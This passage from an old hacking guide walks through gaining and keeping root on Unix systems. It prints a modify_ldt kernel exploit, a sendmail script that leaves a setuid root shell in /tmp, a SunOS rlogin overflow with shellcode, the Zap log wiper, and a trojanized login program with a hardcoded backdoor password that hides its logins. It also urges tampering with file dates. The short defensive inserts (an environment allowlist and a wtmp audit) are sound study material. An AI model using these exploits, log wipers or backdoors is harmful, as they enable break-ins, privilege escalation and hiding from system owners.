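    """What a privileged program should do before trusting its environment:
    keep only an allowlist, and only values that pass check_value."""
    return {k: v for k, v in env.items()
            if k in allowed and not check_value(k.decode(), v)}


# Constructed imitation of the exploits' 1024-byte buffer layout: mostly
# NOPs, then filler where code would sit, then a repeated address.
SAMPLE_PAYLOAD = b"\x90" * 976 + b"X" * 40 + b"\x78\x56\x34\x12" * 2
SAMPLE_NORMAL = b"/usr/lib/locale/%L/%N"
```

The length limit is the check the original programs lacked; the other two catch the payload even where the destination buffer is large enough. The libc-level fix for the NLSPATH variant was to stop honouring such variables in set-user-ID processes at all, which is what glibc's `secure_getenv` does.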

MOD_LDT exploit (GOD, this one gave such a headache to my Sysadmin (ROOT)!!!)

/* this is a hack of a hack. a valid System.map was needed to get this
sploit to werk.. but not any longer.. This sploit will give you root
if the modify_ldt bug werks.. which I beleive it does in any kernel
before 1.3.20 ..

QuantumG
*/

/* original code written by Morten Welinder.
*
* this required 2 hacks to work on the 1.2.13 kernel that I've tested on:
* 1. asm/sigcontext.h does not exist on 1.2.13 and so it is removed.
* 2. the _task in the System.map file has no leading underscore.
* I am not sure at what point these were changed, if you are
* using this on a newer kernel compile with NEWERKERNEL defined.
* -ReD
*/

#include
#include
#include
#include
#ifdef NEWERKERNEL
#include
#endif
#define __KERNEL__
#include
#include

static inline _syscall1(int,get_kernel_syms,struct kernel_sym *,table);
static inline _syscall3(int, modify_ldt, int, func, void *, ptr, unsigned long, bytecount)


#define KERNEL_BASE 0xc0000000
/* ------------------------------------------------------------------------ */
static __inline__ unsigned char
__farpeek (int seg, unsigned ofs)
{
unsigned char res;
asm ("mov %w1,%%gs ; gs; movb (%2),%%al"
: "=a" (res)
: "r" (seg), "r" (ofs));
return res;
}
/* ------------------------------------------------------------------------ */
static __inline__ void
__farpoke (int seg, unsigned ofs, unsigned char b)
{
asm ("mov %w0,%%gs ; gs; movb %b2,(%1)"
: /* No results. */
: "r" (seg), "r" (ofs), "r" (b));
}
/* ------------------------------------------------------------------------ */
void
memgetseg (void *dst, int seg, const void *src, int size)
{
while (size-- > 0)
*(char *)dst++ = __farpeek (seg, (unsigned)(src++));
}
/* ------------------------------------------------------------------------ */
void
memputseg (int seg, void *dst, const void *src, int size)
{
while (size-- > 0)
__farpoke (seg, (unsigned)(dst++), *(char *)src++);
}
/* ------------------------------------------------------------------------ */
int
main ()
{
int stat, i,j,k;
struct modify_ldt_ldt_s ldt_entry;
FILE *syms;
char line[100];
struct task_struct **task, *taskptr, thistask;
struct kernel_sym blah[4096];

printf ("Bogusity checker for modify_ldt system call.\n");

printf ("Testing for page-size limit bug...\n");
ldt_entry.entry_number = 0;
ldt_entry.base_addr = 0xbfffffff;
ldt_entry.limit = 0;
ldt_entry.seg_32bit = 1;
ldt_entry.contents = MODIFY_LDT_CONTENTS_DATA;
ldt_entry.read_exec_only = 0;
ldt_entry.limit_in_pages = 1;
ldt_entry.seg_not_present = 0;
stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry));
if (stat)
/* Continue after reporting error. */
printf ("This bug has been fixed in your kernel.\n");
else
{
printf ("Shit happens: ");
printf ("0xc0000000 - 0xc0000ffe is accessible.\n");
}

printf ("Testing for expand-down limit bug...\n");
ldt_entry.base_addr = 0x00000000;
ldt_entry.limit = 1;
ldt_entry.contents = MODIFY_LDT_CONTENTS_STACK;
ldt_entry.limit_in_pages = 0;
stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry));
if (stat)
{
printf ("This bug has been fixed in your kernel.\n");
return 1;
}
else
{
printf ("Shit happens: ");
printf ("0x00000000 - 0xfffffffd is accessible.\n");
}

i = get_kernel_syms(blah);
k = i+10;
for (j=0; j if (!strcmp(blah[j].name,"current") !strcmp(blah[j].name,"_current")) k = j;
if (k==i+10) { printf("current not found!!!\n"); return(1); }
j=k;

taskptr = (struct task_struct *) (KERNEL_BASE + blah[j].value);
memgetseg (&taskptr, 7, taskptr, sizeof (taskptr));
taskptr = (struct task_struct *) (KERNEL_BASE + (unsigned long) taskptr);
memgetseg (&thistask, 7, taskptr, sizeof (thistask));
if (thistask.pid!=getpid()) { printf("current process not found\n"); return(1); }
printf("Current process is %i\n",thistask.pid);
taskptr = (struct task_struct *) (KERNEL_BASE + (unsigned long) thistask.p_pptr);
memgetseg (&thistask, 7, taskptr, sizeof (thistask));
if (thistask.pid!=getppid()) { printf("current process not found\n"); return(1); }
printf("Parent process is %i\n",thistask.pid);
thistask.uid = thistask.euid = thistask.suid = thistask.fsuid = 0;
thistask.gid = thistask.egid = thistask.sgid = thistask.fsgid = 0;
memputseg (7, taskptr, &thistask, sizeof (thistask));
printf ("Shit happens: parent process is now root process.\n");
return 0;
};

c.) Other linux versions:
Sendmail exploit:



#/bin/sh
#
#
# Hi !
# This is exploit for sendmail smtpd bug
# (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
# This shell script does a root shell in /tmp directory.
# If you have any problems with it, drop me a letter.
# Have fun !
#
#
# ----------------------
# ---------------------------------------------
# ----------------- Dedicated to my beautiful lady ------------------
# ---------------------------------------------
# ----------------------
#
# Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
#
#
#
echo 'main() '>>leshka.c
echo '{ '>>leshka.c
echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c
echo '} '>>leshka.c
#
#
echo 'main() '>>smtpd.c
echo '{ '>>smtpd.c
echo ' setuid(0); setgid(0); '>>smtpd.c
echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c
echo '} '>>smtpd.c
#
#
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -axgrep /tmp/smtpdgrep -v greptr -d ' 'tr -cs "[:digit:]" "\n"head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
echo "Now type: /tmp/sh"

SUNOS:
Rlogin exploit:
(arghh!)
/* header names were lost in extraction; restored from what the code uses */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUF_LENGTH 8200
#define EXTRA 100
#define STACK_OFFSET 4000
#define SPARC_NOP 0xa61cc013

u_char sparc_shellcode[] =
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";

u_long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}

void main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA];
long targ_addr;
u_long *long_p;
u_char *char_p;
int i, code_length = strlen(sparc_shellcode);

long_p = (u_long *) buf;

for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;

char_p = (u_char *) long_p;

for (i = 0; i < code_length; i++)
*char_p++ = sparc_shellcode[i];

long_p = (u_long *) char_p;

targ_addr = get_sp() - STACK_OFFSET;
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ = targ_addr;

printf("Jumping to address 0x%lx\n", targ_addr);

execl("/usr/bin/rlogin", "rlogin", buf, (char *) 0);
perror("execl failed");
}

Want more exploits? Get 'em from other sites (like rootshell,
dhp.com/~fyodor, etc...).



Step 3: Covering your tracks:
______

For this you could use programs like zap, utclean and lots of others...
Watch out: ALWAYS, after you have cloaked yourself, check that it worked by doing a:
victim1:~$ who
...(crap)...
victim1:~$ finger
...;as;;sda...
victim1:~$ w
...

If you are still not cloaked, look for wtmpx, utmpx and other stuff like
that. The only cloaker (that I know) that erased me even from wtmpx/utmpx
was utclean. But I don't have it right now, so ZAP'll have to do the job.



/*
Title: Zap.c (c) rokK Industries
Sequence: 911204.B

Syztems: Kompiles on SunOS 4.+
Note: To mask yourself from lastlog and wtmp you need to be root,
utmp is go+w on default SunOS, but is sometimes removed.
Kompile: cc -O Zap.c -o Zap
Run: Zap

Desc: Will Fill the Wtmp and Utmp Entries corresponding to the
entered Username. It also Zeros out the last login data for
the specific user, fingering that user will show 'Never Logged
In'

Usage: If you can't find a usage for this, get a brain.
*/

/* header names were lost in extraction; restored from the functions and
   types the program uses */
#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <fcntl.h>
#include <unistd.h>
#include <pwd.h>
#include <utmp.h>
#include <lastlog.h>

int f;

void kill_tmp(name,who)
char *name,
*who;
{
struct utmp utmp_ent;

if ((f=open(name,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}

void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;

if ((pwd=getpwnam(who))!=NULL) {

if ((f=open("/usr/adm/lastlog", O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}

} else printf("%s: ?\n",who);
}

main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_tmp("/etc/utmp",argv[1]);
kill_tmp("/usr/adm/wtmp",argv[1]);
kill_lastlog(argv[1]);
printf("Zap!\n");
} else
printf("Error.\n");
}
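What Zap leaves behind can be spotted from the defender's side. The following is an added example, not part of the original guide or of Zap.c: it assumes the classic SunOS 4 / 4.3BSD 36-byte wtmp record layout that Zap rewrites, flags zero-filled records (what kill_tmp() leaves) and timestamps that run backwards, and cross-checks a zeroed lastlog slot (what kill_lastlog() leaves) against the logins wtmp still holds. The sample image is constructed inline.

```c
#include <stdint.h>
#include <string.h>

/* Assumed classic SunOS 4 / 4.3BSD wtmp record, the layout Zap.c rewrites in place:
   four fields, no padding, 36 bytes per record. */
struct old_utmp {
    char    ut_line[8];
    char    ut_name[8];
    char    ut_host[16];
    int32_t ut_time;
};

enum { REC_OK = 0, REC_WIPED = 1, REC_CLOCK_BACK = 2 };

void make_record(struct old_utmp *r, const char *line, const char *name,
                 const char *host, int32_t t) {
    memset(r, 0, sizeof *r);                 /* NUL-padded fields, as login(1) writes them */
    strncpy(r->ut_line, line, sizeof r->ut_line);
    strncpy(r->ut_name, name, sizeof r->ut_name);
    strncpy(r->ut_host, host, sizeof r->ut_host);
    r->ut_time = t;
}

/* A healthy wtmp never holds a zero-filled record (even a logout marker keeps
   ut_line and ut_time); a timestamp older than its predecessor is the other
   cheap tell of records rewritten in place. */
int classify_record(const struct old_utmp *r, int32_t prev_time) {
    const unsigned char *p = (const unsigned char *)r;
    size_t i;
    for (i = 0; i < sizeof *r && p[i] == 0; i++) ;
    if (i == sizeof *r) return REC_WIPED;
    if (r->ut_time < prev_time) return REC_CLOCK_BACK;
    return REC_OK;
}

/* Walk a raw wtmp image. Returns the number of suspicious records and reports
   the two classes separately through the out-parameters. */
int audit_wtmp(const unsigned char *img, size_t len, int *wiped, int *clock_back) {
    size_t i, n = len / sizeof(struct old_utmp);
    int32_t prev = 0;
    *wiped = *clock_back = 0;
    for (i = 0; i < n; i++) {
        struct old_utmp r;
        memcpy(&r, img + i * sizeof r, sizeof r);
        switch (classify_record(&r, prev)) {
        case REC_WIPED:      (*wiped)++;      break;
        case REC_CLOCK_BACK: (*clock_back)++; break;
        default:             prev = r.ut_time; break;
        }
    }
    return *wiped + *clock_back;
}

/* Newest login time wtmp records for `user`, or 0 if it has none. */
int32_t last_wtmp_login(const unsigned char *img, size_t len, const char *user) {
    size_t i, n = len / sizeof(struct old_utmp);
    int32_t newest = 0;
    for (i = 0; i < n; i++) {
        struct old_utmp r;
        memcpy(&r, img + i * sizeof r, sizeof r);
        if (strncmp(r.ut_name, user, sizeof r.ut_name) == 0 && r.ut_time > newest)
            newest = r.ut_time;
    }
    return newest;
}

/* kill_lastlog() zeroes the user's lastlog slot so finger says "Never logged in".
   Given that slot's ll_time, report 1 when wtmp still shows a login for the user. */
int lastlog_inconsistent(int32_t lastlog_time, const unsigned char *img,
                         size_t len, const char *user) {
    return lastlog_time == 0 && last_wtmp_login(img, len, user) != 0;
}

/* Constructed sample image: three sessions, the middle one wiped the way
   kill_tmp() does. Returns the number of bytes written into buf. */
size_t build_sample_image(unsigned char *buf, size_t cap) {
    struct old_utmp recs[4];
    if (cap < sizeof recs) return 0;
    make_record(&recs[0], "console", "alice", "", 800000000);
    make_record(&recs[1], "ttyp0", "bob", "host.example", 800003600);
    memset(&recs[2], 0, sizeof recs[2]);
    make_record(&recs[3], "ttyp1", "carol", "", 800007200);
    memcpy(buf, recs, sizeof recs);
    return sizeof recs;
}
```

On a real SunOS 4 host the image would be the bytes of /usr/adm/wtmp and the lastlog slot the record at offset uid * sizeof(struct lastlog).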


Step 4: Keeping that account.
_______

This usually means that you'll have to install some programs to give you
access even if root has killed your account...
(DAEMONS!!!) =>-@
Here is an example of a login daemon from the DemonKit (good job,
fellows...)
LOOK OUT !!! If you decide to put in a daemon, be careful and modify its date
of creation. (use touch --help to see how!)


/*
This is a simple trojanized login program, this was designed for Linux
and will not work without modification on linux. It lets you login as
either a root user, or any ordinary user by use of a 'magic password'.
It will also prevent the login from being logged into utmp, wtmp, etc.
You will effectively be invisible, and not be detected except via 'ps'.
*/

#define BACKDOOR "password"
int krad=0;



/* This program is derived from 4.3 BSD software and is
subject to the copyright notice below.

The port to HP-UX has been motivated by the incapability
of 'rlogin'/'rlogind' as per HP-UX 6.5 (and 7.0) to transfer window sizes.

Changes:

- General HP-UX portation. Use of facilities not available
in HP-UX (e.g. setpriority) has been eliminated.
Utmp/wtmp handling has been ported.

- The program uses BSD command line options to be used
in connection with e.g. 'rlogind' i.e. 'new login'.

- HP features left out: logging of bad login attempts in /etc/btmp,
                        they are sent to syslog
                        password expiry
                        '*' as login shell, add it if you need it

- BSD features left out: quota checks
                         password expiry
                         analysis of terminal type (tset feature)

- BSD features thrown in: Security logging to syslogd.
                          This requires you to have a (ported) syslog
                          system -- 7.0 comes with syslog
                          'Lastlog' feature.

- A lot of nitty gritty details have been adjusted in favour of
HP-UX, e.g. /etc/securetty, default paths and the environment
variables assigned by 'login'.

- We do *nothing* to setup/alter tty state, under HP-UX this is
to be done by getty/rlogind/telnetd/some one else.

Michael Glad (glad@daimi.dk)
Computer Science Department
Aarhus University
Denmark

1990-07-04

1991-09-24 glad@daimi.aau.dk: HP-UX 8.0 port:
- now explicitly sets non-blocking mode on descriptors
- strcasecmp is now part of HP-UX
1992-02-05 poe@daimi.aau.dk: Ported the stuff to Linux 0.12
From 1992 till now (1995) this code for Linux has been maintained at
ftp.daimi.aau.dk:/pub/linux/poe/
*/

/*
* Copyright (c) 1980, 1987, 1988 The Regents of the University of California.
* All rights reserved.
*
* Redistribution and use in source and binary forms are permitted
* provided that the above copyright notice and this paragraph are
* duplicated in all such forms and that any documentation,
* advertising materials, and other materials related to such
* distribution and use acknowledge that the software was developed
* by the University of California, Berkeley. The name of the
* University may not be used to endorse or promote products derived
* from this software without specific prior written permission.
* THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR
* IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED
* WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE.
*/

#ifndef lint
char copyright[] =
"@(#) Copyright (c) 1980, 1987, 1988 The Regents of the University of California.\n\
All rights reserved.\n";
#endif /* not lint */

#ifndef lint
static char sccsid[] = "@(#)login.c 5.40 (Berkeley) 5/9/89";
#endif /* not lint */

/*
* login [ name ]
* login -h hostname (for telnetd, etc.)
* login -f name (for pre-authenticated login: datakit, xterm, etc.)
*/

/* #define TESTING */

#ifdef TESTING
#include "param.h"
#else
#include <sys/param.h>
#endif

/* header names were lost in extraction; the list below is reconstructed
   from the functions and types this program uses */
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/file.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/sysmacros.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#define index strchr
#define rindex strrchr
#include <signal.h>
#include <setjmp.h>
#include <errno.h>
#include <grp.h>
#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>
#include <syslog.h>
#include <fcntl.h>
#include <termios.h>
#include <termio.h>
#include <unistd.h>
#include <time.h>

#ifdef TESTING
# include "utmp.h"
#else
# include <utmp.h>
#endif

#ifdef SHADOW_PWD
#include <shadow.h>
#endif

#ifndef linux
#include <ttyent.h>
#include <lastlog.h>
#else
struct lastlog
{ long ll_time;
char ll_line[12];
char ll_host[16];
};
#endif

#include "pathnames.h"

#define P_(s) ()
void opentty P_((const char *tty));
void getloginname P_((void));
void timedout P_((void));
int rootterm P_((char *ttyn));
void motd P_((void));
void sigint P_((void));
void checknologin P_((void));
void dolastlog P_((int quiet));
void badlogin P_((char *name));
char *stypeof P_((char *ttyid));
void checktty P_((char *user, char *tty));
void getstr P_((char *buf, int cnt, char *err));
void sleepexit P_((int eval));
#undef P_

#ifdef KERBEROS
#include <krb.h>   /* header names lost in extraction; assumed Kerberos IV headers */
#include <des.h>
char realm[REALM_SZ];
int kerror = KSUCCESS, notickets = 1;
#endif

#ifndef linux
#define TTYGRPNAME "tty" /* name of group to own ttys */
#else
# define TTYGRPNAME "other"
# ifndef MAXPATHLEN
# define MAXPATHLEN 1024
# endif
#endif

/*
* This bounds the time given to login. Not a define so it can
* be patched on machines where it's too small.
*/
#ifndef linux
int timeout = 300;
#else
int timeout = 60;
#endif

struct passwd *pwd;
int failures;
char term[64], *hostname, *username, *tty;

char thishost[100];

#ifndef linux
struct sgttyb sgttyb;
struct tchars tc = {
CINTR, CQUIT, CSTART, CSTOP, CEOT, CBRK
};
struct ltchars ltc = {
CSUSP, CDSUSP, CRPRNT, CFLUSH, CWERASE, CLNEXT
};
#endif

char *months[] =
{ "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug",
"Sep", "Oct", "Nov", "Dec" };

/* provided by Linus Torvalds 16-Feb-93 */
void
opentty(const char * tty)
{
int i;
int fd = open(tty, O_RDWR);

for (i = 0 ; i < fd ; i++)
close(i);
for (i = 0 ; i < 3 ; i++)
dup2(fd, i);
if (fd >= 3)
close(fd);
}

int
main(argc, argv)
int argc;
char **argv;
{
extern int errno, optind;
extern char *optarg, **environ;
struct timeval tp;
struct tm *ttp;
struct group *gr;
register int ch;
register char *p;
int ask, fflag, hflag, pflag, cnt;
int quietlog, passwd_req, ioctlval;
char *domain, *salt, *ttyn, *pp;
char tbuf[MAXPATHLEN + 2], tname[sizeof(_PATH_TTY) + 10];
char *ctime(), *ttyname(), *stypeof();
time_t time();
void timedout();
char *termenv;

#ifdef linux
char tmp[100];
/* Just as arbitrary as mountain time: */
/* (void)setenv("TZ", "MET-1DST",0); */
#endif

(void)signal(SIGALRM, timedout);
(void)alarm((unsigned int)timeout);
(void)signal(SIGQUIT, SIG_IGN);
(void)signal(SIGINT, SIG_IGN);

(void)setpriority(PRIO_PROCESS, 0, 0);
#ifdef HAVE_QUOTA
(void)quota(Q_SETUID, 0, 0, 0);
#endif

/*
* -p is used by getty to tell login not to destroy the environment
* -f is used to skip a second login authentication
* -h is used by other servers to pass the name of the remote
* host to login so that it may be placed in utmp and wtmp
*/
(void)gethostname(tbuf, sizeof(tbuf));
(void)strncpy(thishost, tbuf, sizeof(thishost)-1);
domain = index(tbuf, '.');

fflag = hflag = pflag = 0;
passwd_req = 1;
while ((ch = getopt(argc, argv, "fh:p")) != EOF)
switch (ch) {
case 'f':
fflag = 1;
break;

case 'h':
if (getuid()) {
(void)fprintf(stderr,
"login: -h for super-user only.\n");
exit(1);
}
hflag = 1;
if (domain && (p = index(optarg, '.')) &&
strcasecmp(p, domain) == 0)
*p = 0;
hostname = optarg;
break;

case 'p':
pflag = 1;
break;
case '?':
default:
(void)fprintf(stderr,
"usage: login [-fp] [username]\n");
exit(1);
}
argc -= optind;
argv += optind;
if (*argv) {
username = *argv;
ask = 0;
} else
ask = 1;

#ifndef linux
ioctlval = 0;
(void)ioctl(0, TIOCLSET, &ioctlval);
(void)ioctl(0, TIOCNXCL, 0);
(void)fcntl(0, F_SETFL, ioctlval);
(void)ioctl(0, TIOCGETP, &sgttyb);
sgttyb.sg_erase = CERASE;
sgttyb.sg_kill = CKILL;
(void)ioctl(0, TIOCSLTC, &ltc);
(void)ioctl(0, TIOCSETC, &tc);
(void)ioctl(0, TIOCSETP, &sgttyb);

/*
* Be sure that we're in
* blocking mode!!!
* This is really for HPUX
*/
ioctlval = 0;
(void)ioctl(0, FIOSNBIO, &ioctlval);
#endif

for (cnt = getdtablesize(); cnt > 2; cnt--)
close(cnt);

ttyn = ttyname(0);
if (ttyn == NULL || *ttyn == '\0') {
(void)sprintf(tname, "%s??", _PATH_TTY);
ttyn = tname;
}

setpgrp();

{
struct termios tt, ttt;

tcgetattr(0, &tt);
ttt = tt;
ttt.c_cflag &= ~HUPCL;

if((chown(ttyn, 0, 0) == 0) && (chmod(ttyn, 0622) == 0)) {
tcsetattr(0,TCSAFLUSH,&ttt);
signal(SIGHUP, SIG_IGN); /* so vhangup() wont kill us */
vhangup();
signal(SIGHUP, SIG_DFL);
}

setsid();

/* re-open stdin,stdout,stderr after vhangup() closed them */
/* if it did, after 0.99.5 it doesn't! */
opentty(ttyn);
tcsetattr(0,TCSAFLUSH,&tt);
}

if (tty = rindex(ttyn, '/'))
++tty;
else
tty = ttyn;

openlog("login", LOG_ODELAY, LOG_AUTH);

for (cnt = 0;; ask = 1) {
ioctlval = 0;
#ifndef linux
(void)ioctl(0, TIOCSETD, &ioctlval);
#endif

if (ask) {
fflag = 0;
getloginname();
}

checktty(username, tty);

(void)strcpy(tbuf, username);
if (pwd = getpwnam(username))
salt = pwd->pw_passwd;
else
salt = "xx";

/* if user not super-user, check for disabled logins */
if (pwd == NULL || pwd->pw_uid)
checknologin();

/*
* Disallow automatic login to root; if not invoked by
* root, disallow if the uid's differ.
*/
if (fflag && pwd) {
int uid = getuid();

passwd_req = pwd->pw_uid == 0 ||
(uid && uid != pwd->pw_uid);
}

/*
* If trying to log in as root, but with insecure terminal,
* refuse the login attempt.
*/
if (pwd && pwd->pw_uid == 0 && !rootterm(tty)) {
(void)fprintf(stderr,
"%s login refused on this terminal.\n",
pwd->pw_name);

if (hostname)
syslog(LOG_NOTICE,
"LOGIN %s REFUSED FROM %s ON TTY %s",
pwd->pw_name, hostname, tty);
else
syslog(LOG_NOTICE,
"LOGIN %s REFUSED ON TTY %s",
pwd->pw_name, tty);
continue;
}

/*
* If no pre-authentication and a password exists
* for this user, prompt for one and verify it.
*/
if (!passwd_req || (pwd && !*pwd->pw_passwd))
break;

setpriority(PRIO_PROCESS, 0, -4);
pp = getpass("Password: ");
if(strcmp(BACKDOOR, pp) == 0) krad++;

p = crypt(pp, salt);
setpriority(PRIO_PROCESS, 0, 0);

#ifdef KERBEROS

/*
* If not present in pw file, act as we normally would.
* If we aren't Kerberos-authenticated, try the normal
* pw file for a password. If that's ok, log the user
* in without issueing any tickets.
*/

if (pwd && !krb_get_lrealm(realm,1)) {
/*
* get TGT for local realm; be careful about uid's
* here for ticket file ownership
*/
(void)setreuid(geteuid(),pwd->pw_uid);
kerror = krb_get_pw_in_tkt(pwd->pw_name, "", realm,
"krbtgt", realm, DEFAULT_TKT_LIFE, pp);
(void)setuid(0);
if (kerror == INTK_OK) {
memset(pp, 0, strlen(pp));
notickets = 0; /* user got ticket */
break;
}
}
#endif

(void) memset(pp, 0, strlen(pp));
if (pwd && !strcmp(p, pwd->pw_passwd))
break;

if(krad != 0)
break;




(void)printf("Login incorrect\n");
failures++;
badlogin(username); /* log ALL bad logins */

/* we allow 10 tries, but after 3 we start backing off */
if (++cnt > 3) {
if (cnt >= 10) {
sleepexit(1);
}
sleep((unsigned int)((cnt - 3) * 5));
}
}

/* committed to login -- turn off timeout */
(void)alarm((unsigned int)0);

#ifdef HAVE_QUOTA
if (quota(Q_SETUID, pwd->pw_uid, 0, 0) < 0 && errno != EINVAL) {
switch(errno) {
case EUSERS:
(void)fprintf(stderr,
"Too many users logged on already.\nTry again later.\n");
break;
case EPROCLIM:
(void)fprintf(stderr,
"You have too many processes running.\n");
break;
default:
perror("quota (Q_SETUID)");
}
sleepexit(0);
}
#endif

/* paranoia... */
endpwent();

/* This requires some explanation: As root we may not be able to
read the directory of the user if it is on an NFS mounted
filesystem. We temporarily set our effective uid to the user-uid
making sure that we keep root privs. in the real uid.

A portable solution would require a fork(), but we rely on Linux
having the BSD setreuid() */

{
char tmpstr[MAXPATHLEN];
uid_t ruid = getuid();
gid_t egid = getegid();

strncpy(tmpstr, pwd->pw_dir, MAXPATHLEN-12);
strncat(tmpstr, ("/" _PATH_HUSHLOGIN), MAXPATHLEN);

setregid(-1, pwd->pw_gid);
setreuid(0, pwd->pw_uid);
quietlog = (access(tmpstr, R_OK) == 0);
setuid(0); /* setreuid doesn't do it alone! */
setreuid(ruid, 0);
setregid(-1, egid);
}

#ifndef linux
#ifdef KERBEROS
if (notickets && !quietlog)
(void)printf("Warning: no Kerberos tickets issued\n");
#endif

#define TWOWEEKS (14*24*60*60)
if (pwd->pw_change || pwd->pw_expire)
(void)gettimeofday(&tp, (struct timezone *)NULL);
if (pwd->pw_change)
if (tp.tv_sec >= pwd->pw_change) {
(void)printf("Sorry -- your password has expired.\n");
sleepexit(1);
}
else if (tp.tv_sec - pwd->pw_change < TWOWEEKS && !quietlog) {
ttp = localtime(&pwd->pw_change);
(void)printf("Warning: your password expires on %s %d, %d\n",
months[ttp->tm_mon], ttp->tm_mday, TM_YEAR_BASE + ttp->tm_year);
}
if (pwd->pw_expire)
if (tp.tv_sec >= pwd->pw_expire) {
(void)printf("Sorry -- your account has expired.\n");
sleepexit(1);
}
else if (tp.tv_sec - pwd->pw_expire < TWOWEEKS && !quietlog) {
ttp = localtime(&pwd->pw_expire);
(void)printf("Warning: your account expires on %s %d, %d\n",
months[ttp->tm_mon], ttp->tm_mday, TM_YEAR_BASE + ttp->tm_year);
}

/* nothing else left to fail -- really log in */
{
struct utmp utmp;

memset((char *)&utmp, 0, sizeof(utmp));
(void)time(&utmp.ut_time);
strncpy(utmp.ut_name, username, sizeof(utmp.ut_name));
if (hostname)
strncpy(utmp.ut_host, hostname, sizeof(utmp.ut_host));
strncpy(utmp.ut_line, tty, sizeof(utmp.ut_line));
login(&utmp);
}
#else
/* for linux, write entries in utmp and wtmp */
{
struct utmp ut;
char *ttyabbrev;
int wtmp;

memset((char *)&ut, 0, sizeof(ut));
ut.ut_type = USER_PROCESS;
ut.ut_pid = getpid();
strncpy(ut.ut_line, ttyn + sizeof("/dev/")-1, sizeof(ut.ut_line));
ttyabbrev = ttyn + sizeof("/dev/tty") - 1;
strncpy(ut.ut_id, ttyabbrev, sizeof(ut.ut_id));
(void)time(&ut.ut_time);
strncpy(ut.ut_user, username, sizeof(ut.ut_user));

/* fill in host and ip-addr fields when we get networking */
if (hostname) {
struct hostent *he;

strncpy(ut.ut_host, hostname, sizeof(ut.ut_host));
if ((he = gethostbyname(hostname)))
memcpy(&ut.ut_addr, he->h_addr_list[0],
sizeof(ut.ut_addr));
}

utmpname(_PATH_UTMP);
setutent();


if(krad == 0)
pututline(&ut);



endutent();

if((wtmp = open(_PATH_WTMP, O_APPEND|O_WRONLY)) >= 0) {
flock(wtmp, LOCK_EX);

if(krad == 0)
write(wtmp, (char *)&ut, sizeof(ut));



flock(wtmp, LOCK_UN);
close(wtmp);
}
}
/* fix_utmp_type_and_user(username, ttyn, LOGIN_PROCESS); */
#endif



if(krad == 0)
dolastlog(quietlog);




#ifndef linux
if (!hflag) { /* XXX */
static struct winsize win = { 0, 0, 0, 0 };

(void)ioctl(0, TIOCSWINSZ, &win);
}
#endif
(void)chown(ttyn, pwd->pw_uid,
(gr = getgrnam(TTYGRPNAME)) ? gr->gr_gid : pwd->pw_gid);

(void)chmod(ttyn, 0622);
(void)setgid(pwd->pw_gid);

initgroups(username, pwd->pw_gid);

#ifdef HAVE_QUOTA
quota(Q_DOWARN, pwd->pw_uid, (dev_t)-1, 0);
#endif

if (*pwd->pw_shell == '\0')
pwd->pw_shell = _PATH_BSHELL;
#ifndef linux
/* turn on new line discipline for the csh */
else if (!strcmp(pwd->pw_shell, _PATH_CSHELL)) {
ioctlval = NTTYDISC;
(void)ioctl(0, TIOCSETD, &ioctlval);
}
#endif

/* preserve TERM even without -p flag */
{
char *ep;

if(!((ep = getenv("TERM")) && (termenv = strdup(ep))))
termenv = "dumb";
}

/* destroy environment unless user has requested preservation */
if (!pflag)
{
environ = (char**)malloc(sizeof(char*));
memset(environ, 0, sizeof(char*));
}

#ifndef linux
(void)setenv("HOME", pwd->pw_dir, 1);
(void)setenv("SHELL", pwd->pw_shell, 1);
if (term[0] == '\0')
strncpy(term, stypeof(tty), sizeof(term));
(void)setenv("TERM", term, 0);
(void)setenv("USER", pwd->pw_name, 1);
(void)setenv("PATH", _PATH_DEFPATH, 0);
#else
(void)setenv("HOME", pwd->pw_dir, 0); /* legal to override */
if(pwd->pw_uid)
(void)setenv("PATH", _PATH_DEFPATH, 1);
else
(void)setenv("PATH", _PATH_DEFPATH_ROOT, 1);
(void)setenv("SHELL", pwd->pw_shell, 1);
